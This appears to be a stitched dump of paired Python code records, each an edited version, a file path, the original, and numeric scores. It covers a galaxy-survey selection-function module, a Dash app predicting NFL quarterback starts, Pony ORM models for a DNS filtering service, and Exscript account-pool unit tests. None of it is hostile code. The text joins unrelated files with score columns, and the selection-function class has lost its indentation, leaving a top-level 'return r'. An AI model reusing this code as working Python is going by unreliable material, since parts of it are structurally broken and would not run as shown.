            sort_ind = np.argsort(self.xval[:, 0])
            veff = self.veff[sort_ind]
            xval = self.xval[:, 0][sort_ind]
            # Interpolate 1/Veff linearly with constant extension (ext=3).
            spl = spline(
                xval, 1 / veff, k=1, ext=3
            )  # Setup to imitate dftools R version
            return lambda x: np.where(
                x < xval.min(), self._veff_extrap(x), (1 / spl(x))
            )
        elif n_dim == 2:

            def vapprox(xval):
                spl = RectBivariateSpline(
                    self.xval[:, 0], self.xval[:, 1], 1 / self.veff, kx=1, ky=1
                )
                z = 1 / spl.ev(xval[:, 0], xval[:, 1])
                # z = 1 / (akima::interp(x[, 1], x[, 2], 1 / Veff.values, xval[1], xval[2], duplicate = 'mean'))$z
                # NOTE(review): ``np.isnan(z)`` truth-tests a scalar, but the
                # indexing above suggests xval may be a 2-D array; combined
                # with np.vectorize below this looks inconsistent — verify
                # the 2-D code path against a caller.
                if np.isnan(z):
                    return 0
                else:
                    return z

            return np.vectorize(vapprox)
        else:
            raise ValueError(
                "Linear interpolation of Veff not implemented for DF with more than 2 dimensions. Use a different selection type."
            )

    def _veff_extrap(self, x):
        # Use the user extrapolation when given, else the base-class zero.
        if self.veff_extrap is not None:
            return self.veff_extrap(x)
        else:
            return super(SelectionVeffPoints, self)._veff_extrap(x)
@attr.s
class SelectionRdep(Selection):
"""
Base class for selection functions given as r-dependent functions
Parameters
----------
f : callable, optional
The selection function ``f(x,r)``, giving the ratio between the expected number of detected galaxies and true
galaxies of log-mass ``x`` and comoving distance ``r``. Normally this function is bound between 0 and 1.
It takes the value 1 at distances, where objects of mass ``x`` are easily detected, and 0 at distances where
such objects are impossible to detect. A rapid, continuous drop from 1 to 0 normally occurs at the limiting
distance ``rmax``, at which a galaxy of log-mass ``x`` can be picked up. ``f(x,r)`` can never by smaller than 0,
but values larger than 1 are conceivable, if there is a large number of false positive detections in the survey.
The default is ``f(x,r) = erf((1-1e3*r/sqrt(10**x))*20)*0.5+0.5}``, which mimics a sensitivity-limited survey
with a fuzzy limit.
dvdr : callable, optional
The function ``dVdr(r)``, specifying the derivative of the survey volume ``V(r)`` as a function of comoving
distance ``r``. This survey volume is simply the total observed volume, irrespective of the detection probability,
which is already specified by the function ``f``. Normally, the survey volume is given by ``V(r)=Omega*r**3/3``,
where ``Omega`` is the solid angle of the survey. Hence, the derivative is ``dVdr(r)=Omega*r**2``.
The default is ``Omega=2.13966`` [sterradians], chosen such that the expected number of galaxies is exactly 1000
when combined with the default selection function ``f(x,r)``.
g : callable, optional
Function of distance ``r`` describing the number-density variation of galaxies due to cosmic large-scale
structure (LSS). Explicitly, ``g(r)>0`` is the number-density at ``r``, relative to the number-density without
LSS. Values between 0 and 1 are underdense regions, values larger than 1 are overdense regions. In the absence
of LSS, ``g(r)=1``. Note that g is automatically rescaled, such that its average value in the survey volume is 1.
rmin,rmax : float, optional
Minimum and maximum distance of the survey. Outside these limits the function ``f(x,r)`` will automatically be
assumed to be 0.
"""
f = attr.ib(
default=lambda x, r: sp.erf((1 - 1e3 * r / np.sqrt(10 ** x)) * 20) * 0.5 + 0.5,
validator=_callable_validator,
)
dvdr = attr.ib(default=lambda r: 2.13966 * r ** 2, validator=_callable_validator)
g = attr.ib(default=None, validator=attr.validators.optional(_callable_validator))
rmin = attr.ib(default=0, converter=np.float)
rmax = attr.ib(default=20, converter=np.float)
@rmax.validator
def _rmax_validator(self, att, val):
    """Ensure the survey's outer radius exceeds its inner radius."""
    # Raise instead of assert: asserts are stripped under `python -O`,
    # which would silently disable this validation.
    if val <= self.rmin:
        raise ValueError(
            "rmax (%r) must be greater than rmin (%r)" % (val, self.rmin)
        )
def dVdr(self, r):
    """Differential survey volume at distance ``r``, scaled by :attr:`vol_renorm`."""
    raw = self.dvdr(r)
    return raw * self.vol_renorm
@cached_property
def _veff_no_lss_fnc(self):
    """Vectorized integral of ``f(x, r) * dvdr(r)`` over [rmin, rmax] (no LSS)."""
    def integrate_one(xval):
        # Integrate against the raw (un-normalised) dvdr; normalisation happens later.
        integrand = lambda r: self.f(xval, r) * self.dvdr(r)
        value, _err = quad(integrand, self.rmin, self.rmax)[:2]
        return value
    return np.vectorize(integrate_one)
def _veff_no_lss(self, x):
    """Effective survey volume at log-mass ``x``, ignoring large-scale structure."""
    evaluate = self._veff_no_lss_fnc
    return evaluate(x)
@cached_property
def _gnorm(self):
    """
    g(r) properly normalised, such that the average value of g in the survey volume is 1.

    Returns
    -------
    g : callable or None
        Scaled g(r), or None when no LSS model was supplied.
    """
    # No LSS model supplied: nothing to normalise.
    if self.g is None:
        return None
    else:
        # Volume-weighted mean of g over [rmin, rmax]; dividing g by this
        # makes its average over the survey volume exactly 1.
        gnorm = (
            quad(lambda r: self.dVdr(r) * self.g(r), self.rmin, self.rmax)[0]
            / quad(self.dVdr, self.rmin, self.rmax)[0]
        )
        return lambda r: self.g(r) / gnorm
@cached_property
def _veff_fnc(self):
    """
    The effective volume (including LSS, if any provided).

    Returns
    -------
    callable
        Vectorized function of log-mass ``x`` giving the effective volume.
    """
    # A previously fitted LSS correction (set by _get_veff_lss, which also
    # invalidates this cache) takes priority when no explicit g(r) is known.
    if self.g is None and hasattr(self, "_veff_lss"):
        return self._veff_lss
    elif self.g is not None:
        # evaluate effective volume and source count density with LSS
        def veff_lss_elemental(x):
            fct = (
                lambda r: self.f(x, r) * self._gnorm(r) * self.dvdr(r)
            )  # Use the un-normalised dvdr because it will be normalised.
            return quad(fct, self.rmin, self.rmax)[0]
        return np.vectorize(veff_lss_elemental)
    else:
        # Neither a known g(r) nor a fitted correction: plain effective volume.
        return self._veff_no_lss
def _veff_extrap(self, x):
    """Delegate extrapolated effective volume to the parent implementation."""
    # Python 3 zero-argument super() — equivalent to the original
    # super(SelectionRdep, self) but robust to renaming the class.
    return super()._veff_extrap(x)
def _get_veff_lss(self, r, grid, p, model, weight=lambda x: np.ones_like(x)):
    """
    Generate the best-fit Veff in the presence of unknown LSS.

    Parameters
    ----------
    r : array-like
        Observed comoving distances of the sample.
    grid : object
        Evaluation grid over log-mass; must expose ``x``, ``xmin``, ``xmax``
        and ``dvolume`` — TODO confirm exact interface against the caller.
    p : tuple
        Parameters of the current model.
    model : object
        Model exposing ``gdf(x, p)``, the generative distribution function.
    weight : callable, optional
        Weight in ``x`` used when rescaling the LSS-corrected effective
        volume; defaults to uniform weights.
    """
    if self.g is not None:
        raise RuntimeError("You do not need to correct for LSS bias if g is known.")
    # NOTE(review): despite the name, scipy's quad (adaptive quadrature) is
    # used on 1-D grids; higher-dimensional grids are summed directly.
    use_simpson = len(grid.xmin) == 1
    # evaluate integrals
    def integrand_lss(x, r):
        return self.f(x, r) * model.gdf(x, p)
    integral = np.empty(len(r))
    if use_simpson:
        for i in range(len(r)):
            integral[i] = quad(integrand_lss, grid.xmin, grid.xmax, args=(r[i],))[0]
    else:
        for i in range(len(r)):
            integral[i] = np.sum(integrand_lss(grid.x, r[i])) * grid.dvolume
    # make Veff.lss function
    def veff_lss_function_elemental(xval):
        f = self.f(xval, r)
        # Only objects with non-zero selection probability contribute.
        lst = f > 0
        return np.sum(f[lst] / integral[lst])
    veff_lss_scale = np.vectorize(
        veff_lss_function_elemental
    )  # Vectorize(Veff.lss.function.elemental)
    def int_ref(x):
        return self._veff_no_lss(x) * model.gdf(x, p) * weight(x)
    def int_exp(x):
        return veff_lss_scale(x) * model.gdf(x, p) * weight(x)
    if use_simpson:
        reference = quad(int_ref, grid.xmin, grid.xmax)[0]
        expectation = quad(int_exp, grid.xmin, grid.xmax)[0]
    else:
        reference = np.sum(int_ref(grid.x)) * grid.dvolume
        expectation = np.sum(int_exp(grid.x)) * grid.dvolume
    # Rescale so the weighted expectation matches the no-LSS reference.
    self._veff_lss = lambda x: veff_lss_scale(x) * reference / expectation
    # We must do this otherwise we just get the cached version of _veff_fnc
    del self._veff_fnc
    return self._veff_lss
def mock_r(self, x, verbose=True):
    """
    Create a random sample of distances given a sample of x.

    Parameters
    ----------
    x : array-like
        Log-mass values for which distances are drawn.
    verbose : bool, optional
        If True, print a warning when max(f*g) is much larger than 1.

    Returns
    -------
    r : array-like
        Array of the same length as x given distances to each object.
    """
    # ======================================
    # find maximum of fg(x,r) = f(x,r)*g(r)
    # ======================================
    def fg(x, r):
        if self.g is not None:
            return self.f(x, r) * self._gnorm(r)
        else:
            return self.f(x, r)
    # Coarse 100x100 grid scan to seed the optimiser with a good start point.
    xseq = np.linspace(self.xmin, self.xmax, 100)
    rseq = np.linspace(self.rmin, self.rmax, 100)
    X, R = np.meshgrid(xseq, rseq)
    def fct(p):
        return -fg(p[0], p[1])
    q = fct((X.flatten(), R.flatten()))  # apply(xrgrid, 1, fct)
    # q = -fg, so a positive maximum means fg went negative somewhere.
    if np.max(q) > 0:
        raise ValueError("f*g can never by smaller than 0.")
    xbegin = X.flatten()[np.argmin(q)]
    rbegin = R.flatten()[np.argmin(q)]
    # Refine the grid maximum with bounded L-BFGS.
    opt = minimize(
        fct,
        x0=(xbegin, rbegin),
        method="L-BFGS-B",
        bounds=((self.xmin, self.xmax), (self.rmin, self.rmax)),
    )
    fgmax = -opt.fun
    if fgmax > 5 and verbose:
        print(
            "The maximum of f(r)*<g(r)> (=%f) is significantly larger than 1. Check if this is intended."
            % fgmax
        )
    # ============================================
    # sample distances (r) using cumsum algorithm
    # ============================================
    n = len(x)
    r = np.empty(n)
    dr = min(0.005, (self.rmax - self.rmin) / 1000)
    rgrid = np.arange(self.rmin, self.rmax, dr)
    cdf = np.cumsum(self.dVdr(rgrid))  # cumulative volume out to r
    qnf = spline(cdf, rgrid)  # quantile function of source count density
    # Rejection sampling: draw r from the volume distribution, accept with
    # probability fg/fgmax; retry unaccepted objects for at most 100 rounds.
    lst = np.arange(n)
    m = n
    count = 0
    while m > 0 and count < 100:
        count += 1
        r[lst] = qnf(np.random.uniform(cdf[0], cdf[-1], m))
        rejected = fg(x[lst], r[lst]) < np.random.uniform(size=m) * fgmax
        lst = lst[rejected]
        m = len(lst)
    # sample distances (r) using deterministic uniroot algorithm to avoid iterating forever
    if m > 0:
        def get_random_r(x):
            # H(r): un-normalised CDF of the target distance distribution.
            H = np.vectorize(
                lambda r: quad(lambda r: fg(x, r) * self.dVdr(r), self.rmin, r)[0]
            )
            def H_inv(y):
                # Invert H by root finding on [rmin, rmax].
                return brentq(lambda x: H(x) - y, a=self.rmin, b=self.rmax)
            return H_inv(np.random.uniform() * H(self.rmax))
        for i in lst:
            r[i] = get_random_r(x[i])
return r | 0.90653 | 0.507385 |
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
from joblib import load
pipeline = load('assets/pipeline.joblib')
import pandas as pd
@app.callback(
    Output('prediction-content', 'children'),
    [
        Input('games_played', 'value'), Input('passing_completions', 'value'), Input('passing_attempts', 'value'),
        Input('passing_percentage', 'value'), Input('passing_yards', 'value'), Input('passing_tds', 'value'),
        Input('passing_ints', 'value'), Input('passer_rating', 'value'), Input('passes_per_year', 'value'),
        Input('completions_per_year', 'value'), Input('yards_per_year', 'value'), Input('tds_per_year', 'value'),
        Input('ints_per_year', 'value'), Input('height', 'value'), Input('weight', 'value'),
        Input('forty_yard_dash', 'value'), Input('vert_leap', 'value'), Input('broad_jump', 'value'),
        Input('shuttle_run', 'value'), Input('three_cone', 'value'), Input('no_combine_attendance', 'value'),
        Input('power_five_conf', 'value'), Input('conference_championships', 'value'), Input('wins_per_year', 'value'),
    ],
)
def predict(games_played, passing_completions, passing_attempts,
            passing_percentage, passing_yards, passing_tds, passing_ints,
            passer_rating, passes_per_year, completions_per_year, yards_per_year,
            tds_per_year, ints_per_year, height, weight, forty_yard_dash,
            vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
            power_five_conf, conference_championships, wins_per_year):
    """Predict a quarterback's expected NFL starts per season.

    Dash callback: fires whenever any of the form inputs change. The
    positional arguments must stay in the same order as the Input list
    above, and the DataFrame columns must match the feature order the
    pipeline was trained on.

    Returns
    -------
    An ``html.H1`` with the rounded prediction, rendered into
    the ``prediction-content`` div.
    """
    # Cleaned up: removed commented-out remnants of an earlier 4-feature
    # prototype that obscured the argument/column alignment.
    feature_names = [
        'games_played', 'passing_completions', 'passing_attempts',
        'passing_percentage', 'passing_yards', 'passing_tds', 'passing_ints',
        'passer_rating', 'passes_per_year', 'completions_per_year', 'yards_per_year',
        'tds_per_year', 'ints_per_year', 'height', 'weight', 'forty_yard_dash',
        'vert_leap', 'broad_jump', 'shuttle_run', 'three_cone', 'no_combine_attendance',
        'power_five_conf', 'conference_championships', 'wins_per_year',
    ]
    feature_values = [
        games_played, passing_completions, passing_attempts,
        passing_percentage, passing_yards, passing_tds, passing_ints,
        passer_rating, passes_per_year, completions_per_year, yards_per_year,
        tds_per_year, ints_per_year, height, weight, forty_yard_dash,
        vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
        power_five_conf, conference_championships, wins_per_year,
    ]
    df = pd.DataFrame(columns=feature_names, data=[feature_values])
    y_pred = pipeline.predict(df)[0]
    return html.H1(f'{y_pred:.0f} Starts')
# 2 column layout. 1st column width = 4/12
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
# Left column: per-season stats and combine measurements, as label/input pairs.
column1 = dbc.Col(
    [
        dcc.Markdown(
            """
            ## Predictions
            Input the college stats of the quarterback that you would like to predict.
            """
        ),
    ]
    + [
        element
        for label, field_id, hint, default in [
            ('#### Completions per Year', 'completions_per_year', 'AVG: 178', 178),
            ('#### Passing Yards per Season', 'yards_per_year', 'AVG: 2194', 2194),
            ('#### Passes per Year', 'passes_per_year', 'AVG: 211', 211),
            ('#### Passing TDs per Season', 'tds_per_year', 'AVG: 15', 15),
            ('#### Interceptions per Season', 'ints_per_year', 'AVG: 8', 8),
            ('#### Height (in)', 'height', 'AVG: 74', 74),
            ('#### Weight (lb)', 'weight', 'AVG: 222 lbs', 222),
            ('#### 40 Time', 'forty_yard_dash', 'AVG: 4.87 Seconds', 4.87),
            ('#### Vertical Leap (in)', 'vert_leap', 'AVG: 24 inches', 24),
            ('#### 3-Cone Drill', 'three_cone', 'AVG: 7.34 Seconds', 7.34),
            ('#### Broad Jump', 'broad_jump', 'AVG: 106 inches', 106),
            ('#### Shuttle Run', 'shuttle_run', 'AVG: 4.46 Seconds', 4.46),
        ]
        for element in (
            dcc.Markdown(label),
            dcc.Input(id=field_id, placeholder=hint, type='number', value=default),
        )
    ],
    md=4,
)
# Middle column: career totals (numeric inputs), sliders and dropdowns.
column2 = dbc.Col(
    [
        element
        for label, field_id, hint, default in [
            ('#### Games Played', 'games_played', 'AVG: 32 Games', 32),
            ('#### Total Passing Completions', 'passing_completions', 'AVG: 563', 563),
            ('#### Total Passing Attempts', 'passing_attempts', 'AVG: 939', 939),
            ('#### Career Passing Percentage', 'passing_percentage', 'AVG: 59.2', 59.2),
            ('#### Total Passing Yards', 'passing_yards', 'AVG: 6900', 6900),
            ('#### Total Passing TDs', 'passing_tds', 'AVG: 49', 49),
            ('#### Total Interceptions', 'passing_ints', 'AVG: 26', 26),
            ('#### Career Passer Rating', 'passer_rating', 'AVG: 131', 131),
        ]
        for element in (
            dcc.Markdown(label),
            dcc.Input(id=field_id, placeholder=hint, type='number', value=default),
        )
    ]
    + [
        dcc.Markdown('#### Wins per Year'),
        dcc.Slider(
            id='wins_per_year',
            min=0,
            max=12,
            # Bug fix: step was 13 — larger than the whole 0-12 range — which
            # made every intermediate mark unselectable. One win per step.
            step=1,
            value=5,
            marks={n: str(n) for n in range(0, 13, 1)},
            className='mb-5',
        ),
        dcc.Markdown('#### Conference Championships Won'),
        dcc.Slider(
            id='conference_championships',
            min=0,
            max=4,
            # Bug fix: step was 4, allowing only 0 and 4 despite marks 0-4.
            step=1,
            value=0,
            marks={n: str(n) for n in range(0, 5, 1)},
            className='mb-5',
        ),
        dcc.Markdown('#### Attended Combine'),
        # The trained feature is "no_combine_attendance", hence Yes -> 0, No -> 1.
        dcc.Dropdown(
            id='no_combine_attendance',
            options=[
                {'label': 'Yes', 'value': 0},
                {'label': 'No', 'value': 1},
            ],
            value=0,
            className='mb-5',
        ),
        dcc.Markdown('#### Power 5 Conference'),
        dcc.Dropdown(
            id='power_five_conf',
            options=[
                {'label': 'Yes', 'value': 1},
                {'label': 'No', 'value': 0},
            ],
            value=1,
            className='mb-5',
        ),
    ],
    md=4,
)
# Right column: heading plus the live prediction output target.
column3 = dbc.Col([
    html.H2('Expected NFL Starts per Season', className='mb-5'),
    html.Div(id='prediction-content', className='lead'),
])
layout = dbc.Row([column1, column2, column3]) | pages/predictions.py | import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
from joblib import load
pipeline = load('assets/pipeline.joblib')
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[#Input('completions_per_year', 'value'), Input('wins_per_year', 'value'), Input('height', 'value'),
#Input('forty_yard_dash', 'value')],
Input('games_played', 'value'), Input('passing_completions', 'value'), Input('passing_attempts', 'value'),
Input('passing_percentage', 'value'), Input('passing_yards', 'value'), Input('passing_tds', 'value'),
Input('passing_ints', 'value'), Input('passer_rating', 'value'), Input('passes_per_year', 'value'),
Input('completions_per_year', 'value'), Input('yards_per_year', 'value'), Input('tds_per_year', 'value'),
Input('ints_per_year', 'value'), Input('height', 'value'), Input('weight', 'value'),
Input('forty_yard_dash', 'value'), Input('vert_leap', 'value'), Input('broad_jump', 'value'),
Input('shuttle_run', 'value'), Input('three_cone', 'value'), Input('no_combine_attendance', 'value'),
Input('power_five_conf', 'value'), Input('conference_championships', 'value'), Input('wins_per_year', 'value')],
)
def predict(#completions_per_year, wins_per_year, height, forty_yard_dash):
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year):
df = pd.DataFrame(
columns=[#'completions_per_year','wins_per_year','height','forty_yard_dash'],
'games_played','passing_completions','passing_attempts',
'passing_percentage','passing_yards','passing_tds','passing_ints',
'passer_rating','passes_per_year','completions_per_year','yards_per_year',
'tds_per_year','ints_per_year','height','weight','forty_yard_dash',
'vert_leap','broad_jump','shuttle_run','three_cone','no_combine_attendance',
'power_five_conf','conference_championships','wins_per_year'],
data=[[#completions_per_year, wins_per_year, height, forty_yard_dash]]
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year]]
)
y_pred = pipeline.predict(df)[0]
return html.H1(f'{y_pred:.0f} Starts')
# 2 column layout. 1st column width = 4/12
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Input the college stats of the quarterback that you would like to predict.
"""
),
dcc.Markdown('#### Completions per Year'),
dcc.Input(
id='completions_per_year',
placeholder='AVG: 178',
type='number',
value=178
),
dcc.Markdown('#### Passing Yards per Season'),
dcc.Input(
id='yards_per_year',
placeholder='AVG: 2194',
type='number',
value=2194
),
dcc.Markdown('#### Passes per Year'),
dcc.Input(
id='passes_per_year',
placeholder='AVG: 211',
type='number',
value=211
),
dcc.Markdown('#### Passing TDs per Season'),
dcc.Input(
id='tds_per_year',
placeholder='AVG: 15',
type='number',
value=15
),
dcc.Markdown('#### Interceptions per Season'),
dcc.Input(
id='ints_per_year',
placeholder='AVG: 8',
type='number',
value=8
),
dcc.Markdown('#### Height (in)'),
dcc.Input(
id='height',
placeholder='AVG: 74',
type='number',
value=74
),
dcc.Markdown('#### Weight (lb)'),
dcc.Input(
id='weight',
placeholder='AVG: 222 lbs',
type='number',
value=222
),
dcc.Markdown('#### 40 Time'),
dcc.Input(
id='forty_yard_dash',
placeholder='AVG: 4.87 Seconds',
type='number',
value=4.87
),
dcc.Markdown('#### Vertical Leap (in)'),
dcc.Input(
id='vert_leap',
placeholder='AVG: 24 inches',
type='number',
value=24
),
dcc.Markdown('#### 3-Cone Drill'),
dcc.Input(
id='three_cone',
placeholder='AVG: 7.34 Seconds',
type='number',
value=7.34
),
dcc.Markdown('#### Broad Jump'),
dcc.Input(
id='broad_jump',
placeholder='AVG: 106 inches',
type='number',
value=106
),
dcc.Markdown('#### Shuttle Run'),
dcc.Input(
id='shuttle_run',
placeholder='AVG: 4.46 Seconds',
type='number',
value=4.46
),
],
md=4,
)
column2 = dbc.Col(
[
dcc.Markdown('#### Games Played'),
dcc.Input(
id='games_played',
placeholder='AVG: 32 Games',
type='number',
value=32
),
dcc.Markdown('#### Total Passing Completions'),
dcc.Input(
id='passing_completions',
placeholder='AVG: 563',
type='number',
value=563
),
dcc.Markdown('#### Total Passing Attempts'),
dcc.Input(
id='passing_attempts',
placeholder='AVG: 939',
type='number',
value=939
),
dcc.Markdown('#### Career Passing Percentage'),
dcc.Input(
id='passing_percentage',
placeholder='AVG: 59.2',
type='number',
value=59.2
),
dcc.Markdown('#### Total Passing Yards'),
dcc.Input(
id='passing_yards',
placeholder='AVG: 6900',
type='number',
value=6900
),
dcc.Markdown('#### Total Passing TDs'),
dcc.Input(
id='passing_tds',
placeholder='AVG: 49',
type='number',
value=49
),
dcc.Markdown('#### Total Interceptions'),
dcc.Input(
id='passing_ints',
placeholder='AVG: 26',
type='number',
value=26
),
dcc.Markdown('#### Career Passer Rating'),
dcc.Input(
id='passer_rating',
placeholder='AVG: 131',
type='number',
value=131
),
dcc.Markdown('#### Wins per Year'),
dcc.Slider(
id='wins_per_year',
min=0,
max=12,
step=13,
value=5,
marks={n: str(n) for n in range(0,13,1)},
className='mb-5',
),
dcc.Markdown('#### Conference Championships Won'),
dcc.Slider(
id='conference_championships',
min=0,
max=4,
step=4,
value=0,
marks={n: str(n) for n in range(0,5,1)},
className='mb-5',
),
dcc.Markdown('#### Attended Combine'),
dcc.Dropdown(
id='no_combine_attendance',
options = [
{'label': 'Yes', 'value': 0},
{'label': 'No', 'value': 1},
],
value = 0,
className='mb-5',
),
dcc.Markdown('#### Power 5 Conference'),
dcc.Dropdown(
id='power_five_conf',
options = [
{'label': 'Yes', 'value': 1},
{'label': 'No', 'value': 0},
],
value = 1,
className='mb-5',
),
],
md=4,
)
column3 = dbc.Col(
[
html.H2('Expected NFL Starts per Season', className='mb-5'),
html.Div(id='prediction-content', className='lead')
]
)
layout = dbc.Row([column1, column2, column3]) | 0.46952 | 0.181046 |
from pony.orm import Required, Database, Set, Optional, Json
from flask_login import UserMixin
from datetime import datetime
from enum import Enum
from pony.orm.dbapiprovider import StrConverter
from dinamit.core.constants import DomainCategory, DomainAction
from flask import request, url_for
db = Database()
class EnumConverter(StrConverter):
    """Pony ORM converter that persists Python ``Enum`` members by name."""
    def validate(self, val, obj=None):
        # Reject anything that is not an Enum member before it reaches the DB layer.
        if not isinstance(val, Enum):
            raise ValueError('Instance must be Enum type. Got: {}'.format(type(val)))
        return val
    def py2sql(self, val):
        # Store the member's name (a string), not its value.
        return val.name
    def sql2py(self, val):
        # py_type is the concrete Enum subclass; look the member up by stored name.
        return self.py_type[val]
class Client(db.Entity, UserMixin):
    """A registered user account; integrates Pony ORM with Flask-Login."""
    first_name = Required(str)
    last_name = Required(str)
    email = Required(str, unique=True)
    # Bug fix: this line was corrupted to `<PASSWORD>(str)`, which is not valid
    # Python. Restored to a required string field.
    # NOTE(review): presumably this stores a password hash, not plaintext —
    # verify against the registration/login code.
    password = Required(str)
    is_active = Required(bool, default=lambda: True)
    assets = Set('Asset')
    rules = Required(Json, default=lambda: {})
    policy = Required(Json, default=lambda: {})
    queries = Set('Query')
    created_at = Optional(datetime, default=lambda: datetime.now())
    last_login = Optional(datetime)
    @property
    def full_name(self):
        """First and last name joined with a space."""
        return '{} {}'.format(
            self.first_name, self.last_name
        )
class Asset(db.Entity):
    """A client-owned network asset (host), identified by a unique IP."""
    name = Required(str)
    ip = Required(str, unique=True)
    # NOTE(review): defaults to verified — presumably flipped off until the
    # verification flow completes; confirm the intended default.
    is_verified = Required(bool, default=lambda: True)
    verification_hash = Optional(str)
    client = Required(Client)
    queries = Set('Query')
    created_at = Required(datetime, default=lambda: datetime.now())
    @property
    def get_verification_url(self):
        # URL (host + route) the asset owner visits to verify ownership.
        return '{}{}'.format(
            request.host, url_for('asset.verify', verification_hash=self.verification_hash)
        )
class Domain(db.Entity):
    """A domain name observed in DNS queries, with its category classification."""
    name = Required(str)
    category = Required(DomainCategory)
    queries = Set('Query')
    is_subdomain = Required(bool, default=lambda: False)
    created_at = Required(datetime, default=lambda: datetime.now())
class Query(db.Entity):
    """A single DNS query record and the policy decision applied to it."""
    domain = Optional(Domain)
    # The queried name as received.
    request = Required(str)
    # DNS record type — presumably 'A', 'AAAA', etc.; confirm format upstream.
    dns_type = Required(str)
    action = Required(DomainAction)
    # Human-readable explanation of why `action` was chosen.
    reason = Required(str)
    client = Required(Client)
    asset = Optional(Asset)
created_at = Required(datetime, default=lambda: datetime.now()) | dinamit/core/models.py | from pony.orm import Required, Database, Set, Optional, Json
from flask_login import UserMixin
from datetime import datetime
from enum import Enum
from pony.orm.dbapiprovider import StrConverter
from dinamit.core.constants import DomainCategory, DomainAction
from flask import request, url_for
db = Database()
class EnumConverter(StrConverter):
def validate(self, val, obj=None):
if not isinstance(val, Enum):
raise ValueError('Instance must be Enum type. Got: {}'.format(type(val)))
return val
def py2sql(self, val):
return val.name
def sql2py(self, val):
return self.py_type[val]
class Client(db.Entity, UserMixin):
first_name = Required(str)
last_name = Required(str)
email = Required(str, unique=True)
password = <PASSWORD>(str)
is_active = Required(bool, default=lambda: True)
assets = Set('Asset')
rules = Required(Json, default=lambda: {})
policy = Required(Json, default=lambda: {})
queries = Set('Query')
created_at = Optional(datetime, default=lambda: datetime.now())
last_login = Optional(datetime)
@property
def full_name(self):
return '{} {}'.format(
self.first_name, self.last_name
)
class Asset(db.Entity):
name = Required(str)
ip = Required(str, unique=True)
is_verified = Required(bool, default=lambda: True)
verification_hash = Optional(str)
client = Required(Client)
queries = Set('Query')
created_at = Required(datetime, default=lambda: datetime.now())
@property
def get_verification_url(self):
return '{}{}'.format(
request.host, url_for('asset.verify', verification_hash=self.verification_hash)
)
class Domain(db.Entity):
name = Required(str)
category = Required(DomainCategory)
queries = Set('Query')
is_subdomain = Required(bool, default=lambda: False)
created_at = Required(datetime, default=lambda: datetime.now())
class Query(db.Entity):
domain = Optional(Domain)
request = Required(str)
dns_type = Required(str)
action = Required(DomainAction)
reason = Required(str)
client = Required(Client)
asset = Optional(Asset)
created_at = Required(datetime, default=lambda: datetime.now()) | 0.780997 | 0.18352 |
from builtins import range
import sys
import unittest
import re
import os.path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
from Exscript import Account
from Exscript.account import AccountPool
from Exscript.util.file import get_accounts_from_file
class AccountPoolTest(unittest.TestCase):
    """Unit tests for :class:`Exscript.account.AccountPool`."""
    CORRELATE = AccountPool
    def setUp(self):
        # Two distinct accounts plus an empty pool for every test.
        self.user1 = 'testuser1'
        self.password1 = '<PASSWORD>'
        self.account1 = Account(self.user1, self.password1)
        self.user2 = 'testuser2'
        self.password2 = '<PASSWORD>'
        self.account2 = Account(self.user2, self.password2)
        self.accm = AccountPool()
    def testConstructor(self):
        accm = AccountPool()
        self.assertEqual(accm.n_accounts(), 0)
        accm = AccountPool([self.account1, self.account2])
        self.assertEqual(accm.n_accounts(), 2)
    def testAddAccount(self):
        self.assertEqual(self.accm.n_accounts(), 0)
        self.accm.add_account(self.account1)
        self.assertEqual(self.accm.n_accounts(), 1)
        self.accm.add_account(self.account2)
        self.assertEqual(self.accm.n_accounts(), 2)
    def testReset(self):
        self.testAddAccount()
        self.accm.reset()
        self.assertEqual(self.accm.n_accounts(), 0)
    def testHasAccount(self):
        self.assertEqual(self.accm.has_account(self.account1), False)
        self.accm.add_account(self.account1)
        self.assertEqual(self.accm.has_account(self.account1), True)
    def testGetAccountFromHash(self):
        account = Account('user', 'test')
        thehash = account.__hash__()
        self.accm.add_account(account)
        self.assertEqual(self.accm.get_account_from_hash(thehash), account)
    def testGetAccountFromName(self):
        self.testAddAccount()
        self.assertEqual(self.account2,
                         self.accm.get_account_from_name(self.user2))
    def testNAccounts(self):
        self.testAddAccount()
        # Bug fix: this test populated the pool but asserted nothing.
        self.assertEqual(self.accm.n_accounts(), 2)
    def testAcquireAccount(self):
        self.testAddAccount()
        self.accm.acquire_account(self.account1)
        self.account1.release()
        self.accm.acquire_account(self.account1)
        self.account1.release()
        # Add three more accounts.
        filename = os.path.join(os.path.dirname(__file__), 'account_pool.cfg')
        self.accm.add_account(get_accounts_from_file(filename))
        self.assertEqual(self.accm.n_accounts(), 5)
        for _ in range(2000):
            # Each time an account is acquired a different one should be
            # returned.
            acquired = {}
            for _ in range(5):
                account = self.accm.acquire_account()
                self.assertTrue(account is not None)
                self.assertNotIn(account.get_name(), acquired)
                acquired[account.get_name()] = account
            # Release one account.
            acquired['abc'].release()
            # Acquire one account.
            account = self.accm.acquire_account()
            self.assertEqual(account.get_name(), 'abc')
            # Release all accounts.
            for account in list(acquired.values()):
                account.release()
    def testReleaseAccounts(self):
        account1 = Account('foo')
        account2 = Account('bar')
        pool = AccountPool()
        pool.add_account(account1)
        pool.add_account(account2)
        pool.acquire_account(account1, 'one')
        pool.acquire_account(account2, 'two')
        self.assertNotIn(account1, pool.unlocked_accounts)
